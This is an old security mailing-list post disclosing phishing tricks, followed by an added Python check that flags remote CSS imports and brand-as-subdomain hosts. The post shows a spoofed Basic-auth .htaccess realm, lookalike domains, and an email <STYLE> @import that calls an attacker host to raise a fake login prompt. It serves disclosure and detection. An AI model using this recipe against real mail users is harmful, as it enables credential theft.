Stupid Phishing Tricks

http-equiv_at_excite.com
Date: 05/21/04

    Date:         Fri, 21 May 2004 13:46:47 -0000
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
    
    

    Phriday, May 21, 2004

    Several pheeble yet interesting phishing possibilities arise as
    phollows:

    Take one .htaccess trivially modified to suit the target
    scenario:

    AuthName "EXCHANGE SERVER LOGIN ERROR: PLEASE TRY AGAIN"
    AuthType Basic

    One throw-away domain which can include the target's host name:

    http://www.hotmail.hackerguy.nickelandimehosting.com
    http://www.evenlargerbank.money.nickelandimehosting.com
    http://www.bloatedcorp.lackey.nickelandimehosting.com

    A couple of ridiculous email contraptions:

    <STYLE type=text/css>
    @import url( http://www.malware.com/pheesh );
     </STYLE>

    1. Outlook Express

    [screen shot: http://www.malware.com/phool.png 56KB]

    2. Outlook 2003

    [screen shot: http://www.malware.com/ohlook.png 39KB]

    note: the above 'style ***' works on outbound [reply to] [so
    much for not downloading external content] inbound can be
    achieved as well via http://securityfocus.com/bid/10369 which
    has an even more convincing network login applet

    3. Hotmail

    [screen shot: http://www.malware.com/goturmail.png 91KB]

    hint: hotmail [and other] web designer people; off-set the html
    login form on the site as many prime banks have done.

    The possibilities are obviously endless.

    BE AWARE OF THE SHARKS OUT THERE

    NB: anyone have any contact or connection to the upper
    management security or abuse dept. of one public company called:
    SAVVIS Communications. http://savvis.net/ it appears their abuse
    dept. is woefully negligent in attending to abuse affairs.

    End Call

    --
    http://www.malware.com
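
Added example, not part of the original post: a mail-gateway style check for two markers visible in the message above, a `<style>` block that pulls a remote stylesheet through `@import`, and a host name that carries a protected brand as a subdomain label of an unrelated domain. The `PROTECTED` table, the function names and the `.example` domains are assumptions made for illustration.

```python
import re
from urllib.parse import urlparse

# Assumption: brand label -> domains that brand really uses. hotmail.com is real;
# the other two entries are constructed placeholders for the post's fictional names.
PROTECTED = {
    "hotmail": {"hotmail.com"},
    "evenlargerbank": {"evenlargerbank.example"},
    "bloatedcorp": {"bloatedcorp.example"},
}

STYLE_RE = re.compile(r"<style\b[^>]*>(.*?)</style\s*>", re.I | re.S)
# Matches @import url(x), @import url("x") and @import "x"
IMPORT_RE = re.compile(r"@import\s*(?:url\(\s*)?[\"']?([^\"')\s;]+)", re.I)

def css_imports(html):
    """URLs a mail client would fetch through @import in the message's <style> blocks."""
    return [u for css in STYLE_RE.findall(html) for u in IMPORT_RE.findall(css)]

def brand_in_subdomain(url):
    """Return the protected brand used as a host label outside its own domains, else None."""
    host = (urlparse(url).hostname or "").lower().rstrip(".")
    labels = host.split(".")
    for brand, legit in PROTECTED.items():
        owned = any(host == d or host.endswith("." + d) for d in legit)
        if brand in labels and not owned:
            return brand
    return None

def inspect_message(html, links=()):
    """Return (reason, url) findings for one HTML body and the links extracted from it."""
    findings = [("css-import", u) for u in css_imports(html)]
    for u in list(links) + css_imports(html):
        brand = brand_in_subdomain(u)
        if brand:
            findings.append(("brand-as-subdomain:" + brand, u))
    return findings

# Constructed sample: the style block and one host name quoted in the post.
SAMPLE_HTML = """<STYLE type=text/css>
@import url( http://www.malware.com/pheesh );
 </STYLE>"""
SAMPLE_LINKS = ["http://www.hotmail.hackerguy.nickelandimehosting.com",
                "http://www.hotmail.com/"]

if __name__ == "__main__":
    for reason, url in inspect_message(SAMPLE_HTML, SAMPLE_LINKS):
        print(reason, url)
```

The brand check compares whole DNS labels, so it catches the subdomain pattern shown in the post but not misspelled or homoglyph variants of a brand.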
    
